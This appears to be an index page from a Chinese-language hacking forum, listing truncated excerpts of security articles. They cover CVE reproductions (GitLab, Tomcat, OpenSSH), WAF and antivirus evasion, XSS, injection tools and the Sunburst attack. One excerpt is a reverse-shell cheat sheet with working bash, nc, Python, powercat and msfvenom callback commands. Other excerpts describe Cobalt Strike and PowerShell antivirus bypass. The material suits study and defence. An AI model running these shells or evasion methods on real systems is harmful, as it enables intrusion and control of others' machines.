问答中心
来自黑客世界帮助中心部分;你可以在任何与技术和信息学相关的话题上寻求帮助。
查看问题
没有热门问题
-
1 票1 个答案
-
-1 票4 个答案
-
-1 票8 个答案
-
0 票1 个答案
-
0 票0 个答案
1,363个问题在此版块
-
GitLab任意文件读取漏洞复现(CVE-2020-10977)
GitLab任意文件读取漏洞复现(CVE-2020-10977) 0x00简介GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务。GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。使用Git作为代码管理工具,并在此基础上搭建起来的web服务。 0x01漏洞概述在Gitlab 8.5-12.9版本中,存在一处任意文件读取漏洞,攻击者可以利用该漏洞,在不需要特权的状态下,读取任意文件,造成严重信息泄露,从而导致进一步被攻击的风险。 0x02影响版本GitLab GitLab CE/EE >=8.5 and <=12.9 GitLab GitLab CE >=8.5,<=12.9 0x03环境搭建环境:centos7搭建。这里以centos7为例安装,其他系统请参照以下链接 https://mirrors.tuna.tsinghua.edu.cn/help/gitlab-ce/ 1.首先在/etc/yum.repos.d/下新建一个名为gitlab-ce.repo的文件,内容为以下内容 [gitl…
0 票0 个答案 -
Cobaltstrike免杀从源码级到落地思维转变
Cobaltstrike免杀从源码级到落地思维转变 文章来源:https://www.freebuf.com/articles/web/258988.html场景描述最早我为了研究MSF的免杀,去看了MSF木马源码,其采用大马传小马的方式,运行时首先将自己在内存中循环调用三次,也就是为什么会有spwan这个值的原因。它代表将自己在内存中循环调用几次,随后在最后一次时与服务端建立连接,然后服务端将大马传回。后来依照这个逻辑,我自己编写了MSF的客户端对接服务端做到了VT全过。原本想着按照这个思路可以将Cobaltstrike的木马也进行相同逻辑,但随后发现Cobaltstrike并不能生成木马源码,只能生成shellcode。后来听说了加载器的概念,编写一个可以运行16进制的代码无论语言。由于我是做Java的,首先就想到使用Java实现,后来查找了相关资料,运用了很多相关途径都没有找到Java可以运行shellcode的逻辑。后来想起当时开发时用过的关键字Native,并且参考了Python实现。产生了以下思路:python提供了python与c之间的数据类型转换库,可以直接与c对接,叫做ctypes。这点Java却没有,Java与c对接只有Nat…
0 票0 个答案 -
WordPress插件File-Manager任意文件上传
WordPress插件File-Manager任意文件上传 WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。File-Manager插件介绍文件管理器 File Manager 为您提供编辑、删除、上载、下载、复制和粘贴文件和文件夹的功能。可以轻松地将文件夹或任何文件从一个位置复制,移动到另一个位置。File Manager 插件分为免费版本和收费版本。 环境搭建下载地址Wordpress下载地址 https://www.softonic.cn/download/wordpress/windows/post-download/v/5.4.1 插件下载地址 (影响版本File Manager 6.0-6.8) http://plugins.svn.wordpress.org/wp-file-manager/tags/6.0/ 安装XAMPP,搭建WordPress安装XAMPP 将下载的WordPress安装文件复制到XAMPP的htdocs文件夹下 点击XAMPP中MySql栏的Admin按钮,配置安装WordP…
0 票0 个答案 -
突破正则匹配:探寻SQL注入绕过WAF的本源之道
突破正则匹配:探寻SQL注入绕过WAF的本源之道 前言:网络上SQL注入绕过WAF的帖子文章纷繁多样,良莠不齐,眉毛胡子一把抓,各种姿势让人眼花缭乱。于是,便有学生问我,SQL注入绕过WAF的最本质原理是什么……. 0X01 WAF介绍要从本质上回答SQL注入绕过WAF的原理就首先要了解WAF。WAF(Web Application Firewal,网站应用级入侵防御系统)是对Web网站实施安全防护和负载均衡的主要工具,是大小网站标配之一,应用范围极其广泛。WAF从产品形态上来划分,可以大致分为三类:硬件WAF、软件WAF和云WAF。三种WAF的特点和具体例子如图所示:目前,几乎所有的WAF都可以基于规则来识别过滤SQL注入,这是WAF优点,也是我们能够使用多种姿势绕过WAF的前提保证,而基于规则就直接可以理解为基于正则表达式匹配。为说明这个基础判定条件,我们通过公开资料分析主流WAF的详细参数加以佐证。 硬件WAF:从下图可以看出,绿盟硬件WAF中明确指出,多种基于规则的检测基于规则防护来对抗SQL注入,表明硬件WAF采用正则表达式来过滤SQL注入。软件WAF:安全狗作为国内一款低端主流的软件WAF产品,受到众多站长的青睐,其HTTP检测规则中…
0 票0 个答案 -
记录并浅析一次服务器被黑事件
记录并浅析一次服务器被黑事件 0×1 基本情况偶然发现一台web服务器很怪异,其网站页面上增加了一堆外文的页面链接,点击一篇进去之后,内容如下图所示: 该网站是中文网站,绝不可能存在上述的页面内容,同时页面中嵌入一堆的JS代码。很明显,该网站已经被黑,未避免遭受进一步的危害,紧急采取措施让服务器下线。由于该台服务器部署于单位异地远程机房,下线后无法直接对服务器进行分析,只是采取远程协同分析日志文件的方式(拿到一些web日志文件,以及一些异常PHP文档),因此无法实施深入分析。 服务器是windows系统,使用Apache作为web服务器,网站基于PHP+WordPress开发。服务器基本情况: 0×2 页面简单分析上图中的JS代码如下表所示: 经过简单分析,很明显上表中的这段代码应该是攻击者的XSS跨站漏洞利用代码,主要用于获取访问该页面的用户的cookie信息,根据函数名称getCookie也很容易得知其功能。 上述代码中base64加密部分解密后后内容如下: 可知,攻击者XSS服务器为193.238.46.57,地址查询如下图所示,目前该页面无法访问。 0×3 日志分析1、access.log日志分析该日志,发现了密码暴力猜…
0 票0 个答案 -
等保测评2.0:MySQL安全审计
等保测评2.0:MySQL安全审计 一、说明本篇文章主要说一说MySQL数据库安全审计控制点的相关内容和理解。 MySQL除了自身带有的审计功能外,还存在着一些其它的审计插件。 虽然遇到这些插件的概率不高,我还是把这些插件的基本参数都列出来,到时候如果真遇到了,也不至于一头雾水。 二、测评项a)应启用安全审计功能,审计覆盖到每个用户,对重要的用户行为和重要安全事件进行审计; b)审计记录应包括事件的日期和时间、用户、事件类型、事件是否成功及其他与审计相关的信息; c)应对审计记录进行保护,定期备份,避免受到未预期的删除、修改或覆盖等; d)应对审计进程进行保护,防止未经授权的中断。 三、测评项aa)应启用安全审计功能,审计覆盖到每个用户,对重要的用户行为和重要安全事件进行审计; 3.1. 自带的审计功能在MySQL中自带了审计功能——general log,它会记录所有关于mysql的sql语句(所以会给服务器和数据库带来很大的资源占用)。 不过仅仅从测评要求的角度来说,如果开启了general log,那么是符合测评项a的。 查询的时候,可以使用log或者general关键词,这里用的是general(不过用log要好一些): show g…
0 票0 个答案 -
反弹shell总结
反弹shell总结 1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&1 2.nc反弹nc -e /bin/sh 192.168.2.130 4444 3.pythonimport socket,subprocess,os s =socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(( "192.168.2.130" , 4444 )) os.dup2(s.fileno(), 0 ) os.dup2(s.fileno(), 1 ) os.dup2(s.fileno(), 2 ) p = subprocess.call([ "/bin/bash" , "-i" ]) 4.powercatImport-Module .\powercat.ps1 powercat -c 192.168.2.130 -p 4444 -e cmd.exe 5.msf生成exe后门msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.130 LPORT=4444 -f exe…
0 票0 个答案 -
由浅入深了解AES ECB模式加密和明文主动攻击
由浅入深了解AES ECB模式加密和明文主动攻击 加密算法是信息技术领域常常运用的安全算法,运用场景包括了付出、电商、即使通讯等各类应用。在常用的对称加密算法中,AES(Advanced Encryption Standard)凭仗安全性逐步成为国际主流加密算法。对称/分组加密一般分为流加密(如OFB、CFB等)和块加密(如ECB、CBC等)。关于流加密,需求将分组暗码转化为流形式作业。关于块加密(或称分组加密),假如要加密超越块巨细的数据,就需求涉及填充和链加密形式。ECB(Electronic Code Book 电子暗码本)的缺点是不能躲藏明文的形式并且或许对明文进行自动进犯。在CWE(Common Weakness Enumeration 通用缺陷列表)中界说为“损坏或风险的加密算法”,可是在实际的开发中,由于开发者缺少对加密算法知道或许偷闲(究竟ECB形式不需求偏移向量iv,少了 一个变量)常常运用ECB加密形式,本文主要就ECB形式的加密原理及“明文自动进犯”进行由浅入深的论述。 AES ECB加密形式原理 AES ECB加密的大致流程如图1所示,明文依照16字节分红n块,经过加密器对每一块进行加密取得n个密文块。最后一块通常不够16…
0 票0 个答案 -
Sunburst供应链攻击解析
Sunburst供应链攻击解析 近期,数以千计的安排受到了一次供应链进犯的影响,该进犯损坏了SolarWinds Orion软件的更新机制,以交付名为Sunburst的后门特洛伊木马程序(Sunburst后门)(又名Solorigate)。 安全公司FireEye于12月13日披露了袭击的细节。SolarWinds还为其客户发布了一份安全主张。 这场进犯活动至少从2020年3月就开始了。任何在这段时刻内下载更新的Orion软件的用户都或许感染了Sunburst。据FireEye称,进犯者对他们感兴趣的受害者安排子集进行了进一步的歹意活动。 从本质上讲,供应链进犯是不会进行区别方针的,它会感染任何被损坏软件的用户。它们的履行是为了让进犯者可以拜访很多的安排,其中的一个子集将被确定为进一步运用的方针;发现了少数安排的第二级有效载荷(Teardrop后门)被运用了。 Sunburst分析一个名为Sunburst.Orion.Core.BusinessLayer.dll会被进犯者修改为包括一个添的类。该歹意软件设计为在安装后一段时刻内坚持非活动状态。然后它将测验解析avsvmcloud.com的子域。DNS响应将传递一个CNAME记载,该记载将定向到指令…
0 票0 个答案 -
Xencrypt:一款基于PowerShell脚本实现的反病毒绕过工具
Xencrypt:一款基于PowerShell脚本实现的反病毒绕过工具 Xencrypt今天给大家介绍的这款工具名叫Xencrypt,它是一款基于PowerShell脚本实现的反病毒绕过工具。如果你不想花时间对类似invoke-mimikatz这样的PowerShell脚本进行混淆处理以避免其被检测到的话,那么Xencrypt就是你的最佳选择了。Xencrypt能够自动对目标脚本代码进行处理,并且可以生成近乎无限量的变种代码,以帮助研究人员绕过基于签名机制的反病毒检测产品。 从本质上来说,Xencrypt是一款PowerShell代码加密工具,它使用了AES加密算法以及Gzip/DEFLATE压缩算法来对目标脚本代码进行处理,并生成一个完全不同的脚本,但功能却一模一样。首先,它会对输入的脚本代码进行加密和压缩,然后将脚本数据以Payload的形式存储在新的脚本中,而这个新的脚本Payload在运行之前是无法被解密或解压的。 功能介绍当前版本的Xencrypt拥有以下几种强大的功能: 1、绕过AMSI以及VirusToal上目前所使用的所有现代反病毒检测引擎; 2、压缩和加密PowerShell脚本; 3、资源消耗和开销非常小; 4、使用随机化变量…
0 票0 个答案 -
分析黑客使用Web进行攻击的10大原因
分析黑客使用Web进行攻击的10大原因 1.桌面漏洞 Internet Explorer、Firefox和Windows操作系统中包含很多可以被黑客利用的漏洞,特别是在用户经常不及时安装补丁的情况下。黑客会利用这些漏洞在不经用户同意的情况下自动下载恶意软件代码——也称作隐藏式下载。 2.服务器漏洞 由于存在漏洞和服务器管理配置错误,Internet Information Server(IIS)和Apache网络服务器经常被黑客用来攻击。 3.Web服务器虚拟托管 同时托管几个甚至数千个网站的服务器也是恶意攻击的目标。 4.显性/开放式代理 被黑客控制的计算机可以被设置为代理服务器,躲避URL过滤对通信的控制,进行匿名上网或者充当非法网站数据流的中间人。 5.HTML可以从网页内完全不同的服务器嵌入对象 用户可以从特定网站请求浏览网页,只自动地从Google分析服务器等合法网站下载对象;广告服务器;恶意软件下载网站;或者被重新导向至恶意软件网站。 6.普通用户对安全状况不了解 多数用户不了解三种SSL浏览器检查的原因;不了解如何验证所下载程序的合法性;不了解计算机是否不正常;在家庭网络内不使用防火墙;也不知道如何 区分钓鱼网页和合法网页…
0 票0 个答案 -
Tomcat PUT方法任意写文件漏洞复现(CVE-2017-12615)
Tomcat PUT方法任意写文件漏洞复现(CVE-2017-12615) 版本信息Tomcat测验版本:7.0.79 漏洞影响悉数的 Tomcat 版本:Apache Tomcat 7.0.0 - 7.0.79 (windows环境) 漏洞剖析在tomcat官网下载一个Tomcat7的源码压缩包,打开来慢慢看看里边的.xml文件与java代码。 关键装备装备文件途径 apache-tomcat-7.0.10-src\conf\web.xmlDefaultServlet类处理除了JSP文件以外的静态资源 readonly默认为true,在(CVE-2017-12615)的状况下为false。 servlet-name:default对应的是servlet-class:DefaultServlet defaultorg.apache.catalina.servlets.DefaultServletdebug0listingsfalsereadonlyfalse1JspServlet类负责JSP文件的汇编与运转 servlet-name:jsp对应的是servlet-class:JspServlet jsporg.apache.jasp…
0 票0 个答案 -
如何使用Postman更好的进行API渗透测试
如何使用Postman更好的进行API渗透测试 在这个时代,Web 和移动应用程序一般是由 RESTful 网络服务供给支撑的。 公共和私有 API 在互联网上十分普遍,测验这些 API 绝非易事,但有一些东西能够协助你。 虽然(一般用与浸透测验)东西不能代替技术,但即使是最熟练的木匠也能用锤子比用鞋子更有用地钉钉子。 Postman 便是这样一个东西,它在开发者中现已流行了很多年。 在咱们进入怎么设置它的主题之前,咱们先来快速介绍一下这个东西是什么以及能够做什么。 Postman 是一个商业桌面应用程序,可用于 Windows、 Mac OS 和 Linux。 它的大部分功用是免费的,也有付费的功用,比方供给协作和文档功用。 与浸透测验人员比较,这些特性对开发人员更有含义。 它用于办理测验各种 API 调用的 HTTP 恳求集.合,以及包含变量的环境。 它并不能代替你的署理(如:Burp,ZAP,Mitmproxy 等等) ,可是实际上弥补了浏览器和客户端应用程序层缺失的功用。 关于这款东西主要的代替计划是开源东西 Insomnia 和高档 REST 客户端,商业产品 SoapUI,或建立在 Swagger/Swagger UI 或 curl …
0 票0 个答案 -
开源蜜罐T-Pot
开源蜜罐T-Pot T-Pot本次咱们了解的是开源蜜罐,及其与商业蜜罐的比照。 在国内外,许多的开源蜜罐为构建安全网络世界做出了重要贡献。根据目标类型的不同,又分为数据库蜜罐、Web蜜罐、服务蜜罐等。咱们为大家列举了一些开源蜜罐。 在各类蜜罐之中,T-Pot多蜜罐渠道脱颖而出。那么,是什么让它别出心裁呢?让咱们来了解一下 T-Pot多蜜罐渠道。 T-Pot基于linux的网络安装程序。蜜罐看护程序以及正在运用的其他支持组件已运用Docker进行集装箱化。这答应咱们在同一网络接口上运行多个蜜罐看护进程,并将网络接口上捕获的流量从头路由到最合适的开源蜜罐,一起保持较小的占用空间并约束每个蜜罐在其自己的环境中。 这是T-Pot多蜜罐渠道的体系构架图,由此可见,T-Pot是多体系的一个整合。 咱们来简单介绍一下T-Pot的组成部分,正是它们的相互协作构建了一个强大的开源蜜罐渠道。 Elastic-Search Elastic Search 是一个性能十分强大的全文搜索引擎,它能够快速的进行海量数据的查询。在 T-Pot 的实际使用中,各个蜜罐所发生的日志都会导入到 Elastic Search 中,因而能够运用 Elastic Search 来进行检…
0 票0 个答案 -
OpenSSH 命令注入漏洞(CVE-2020-15778)
OpenSSH 命令注入漏洞(CVE-2020-15778) 0x00 缝隙介绍CVE编号:CVE-2020-15778 发布时间:2020-07-24 损害等级:高危 缝隙版别:<= openssh-8.3p1 缝隙描绘:OpenSSH 8.3p1及之前版别中的scp的scp.c文件存在操作系统指令注入缝隙。该缝隙即便在禁用ssh登录的情况下,但是答应运用scp传文件,而且长途服务器答应运用反引号(`),可利用scp仿制文件到长途服务器时,履行带有payload的scp指令,然后在后续利用中getshell。 利用条件:知道目标的ssh暗码 0x01 模拟场景设置iptables策略模拟仅答应运用scp的场景,让该缝隙在特殊环境下实现指令注入。 0x02 试验场景布置靶机环境:Centos 7 渗透机环境:Kali 2019版别 1、查看ssh版别 ssh -V 测验为缝隙存在版别。 2、测验ssh与scp在正常情况下的运用情况。 能够正常运用。 3、履行ervice iptables status 查看是否装置iptables,若已装置IP tables,可跳过第三步。 (1)装置iptables yum install -y ipt…
0 票0 个答案 -
Vue.js下的跨站脚本攻击学习整理
Vue.js下的跨站脚本攻击学习整理 最近学习了vue.js环境下xss进犯场景相关的常识。整理出来共享给大家。 vue.js 下的数据绑定常见的vue.js数据绑定是经过双大括号{{}}或许v-text指令进行的数据绑定的。vue.js会主动将对应的模版编译成js代码。 例如:模版代码为 vue.js会把这段模版代码编译成: function anonymous() { with(this) { return _c('p', { domProps: { "textContent": _s(message) } }, []) } }一般情况下,vue.js经过双大括号向html内容中对指定部分进行插值。 而双大括号{{}}和v-text指令上底层上完成首要都是经过元素 DOM特点的textContent值来完成数据刺进。 这种情况下一般不会呈现注入的问题,因为浏览器的原生api会安全的处理这些值。 但是数据插值有时分需要向页面中刺进富文本信息。假如运用{{}} 和 v-text指令的话,富文本会被转义成一般文本。不能完成需求。 这时分或许需要用到v-html标签。v-html标签的模…
0 票0 个答案 -
如何使用N1QLMap来利用N1QL注入漏洞并从Couchbase数据库中提取数
如何使用N1QLMap来利用N1QL注入漏洞并从Couchbase数据库中提取数 N1QLMapN1QLMap是一款功能强大的N1QL注入缝隙运用东西,当时支撑针对Couchbase数据库进行渗透。该东西支撑通过CURL进行数据提取和SSRF进犯。该东西根据Python开发,因此具备较好的跨渠道特性。 东西下载广阔研究人员能够运用下列指令将该项目源码克隆至本地: git clone https://github.com/FSecureLABS/N1QLMap.git东西帮助信息usage: n1qlMap.py [-h] [-r REQUEST] [-k KEYWORD] [--proxy PROXY] [--validatecerts] [-v] (-d | -ks DATASTORE_URL | -e KEYSPACE_ID | -q QUERY | -c [ENDPOINT [OPTIONS ...]]) host positional arguments: host Host used to send an HTTP…
0 票0 个答案 -
Python对于自定义字符表的Base64编码求解
Python对于自定义字符表的Base64编码求解 说到自定义字符表(Alphabet Table)解码Base64,咱们先得知道Base64是怎样进行编码操作的。接下来咱们先来介绍一下Base64是怎样进行编码的。 首要咱们先来引进ASCII码表:2、一个字节是8个比特,先找到对应的ASCII码,再将其转化为8位的二进制,转化如下:H 对应码值为72,它对应的二进制是 01001000 e对应码值为101,它对应的二进制是:01100101 l对应码值为108,它对应的二进制是:01101100 l对应码值为108,它对应的二进制是:01101100 o对应码值为111,它对应的二进制是:01101111 Base64的码值是0-63,所以用6位的二进制就可以完全表示Base64的码值(如:000000对应十进制0,111111对应的十进制为63),将上面8位一组的二进制变成6位一组的二进制,因为上面是5*8=40个二进制,不能被6整除,所以要加一组0将其变成48个二进制数(假如还是不能整除,还要持续补8个0,其实就是最小公倍数的倍数)。 原来:01001000 01100101 01101100 01101100 01101111 00000…
0 票0 个答案 -
Decoder++:一款专用于渗透的多数据格式编码解码工具
Decoder++:一款专用于渗透的多数据格式编码解码工具 Decoder++Decoder++是一款专用于浸透测验的多数据格局编码解码东西,该东西是一款可扩展的东西,专为浸透测验人员和软件开发人员设计,可以将方针数据编码/解码为各种不同的数据格局。 功用介绍用户接口:图形化用户接口和指令行接口; 预装置脚本和编码解码器: 支撑的编码/解码格局:Base16、Base32、Base64、Binary、Gzip、Hex、Html、JWT、 HTTP64、Octal、Url、Url+、Zlib; 哈希:Adler-32、Apache-Md5、CRC32、FreeBSD-NT、Keccak224、Keccak256、Keccak384、 Keccak512、LM、Md2、Md4、Md5、NT、PHPass、RipeMd160、Sha1、Sha3 224、Sha3 256、Sha3 384、Sha3 512、Sha224、Sha256、Sha348、Sha512、Sun Md5 脚本:CSS-Minify、Caesar、Filter-Lines、Identify File Format、Identify Hash Format、 JS-Beautifie…
0 票0 个答案 -
Nosqli:一款功能强大的NoSql注入命令行接口工具
Nosqli:一款功能强大的NoSql注入命令行接口工具 NosqliNosqli是一款功用强大的NoSql注入指令行接口东西,本质上来说,它就是一款NoSQL扫描和注入东西。Nosqli依据Go语言开发,是一款易于运用的NoSql注入东西,并且供给了完整的指令行接口,并且支撑安全研究人员依据自己的需求来进行自定义配置。 该东西的运转速度十分快,并且扫描成果精确,具备高可用性。除此之外,其指令行接口的运用也十分简单。 功用介绍Nosqli当前支撑针对MongoDB的NoSql注入检测,该东西现在能够执行下列测验: 依据过错的测验:注入各种字符和Payload,扫描已知的Mongo过错呼应;布尔盲注测验:注入包含True/False参数的Payload,并测验判别是否存在注入点;依据时间的测验:测验向目标服务器注入时间延迟,并依据呼应判别是否存在注入点;东西下载广阔研究人员请直接访问该项目的Releases页面并现在对应操作系统的最新版本Nosqli。下载完成后,装置在指定途径,或直接从本地文件目录中运转。 东西运用广阔研究人员能够直接按照下列方法直接运转注入指令或检查帮助信息。 $ nosqli NoSQLInjector is a C…
0 票0 个答案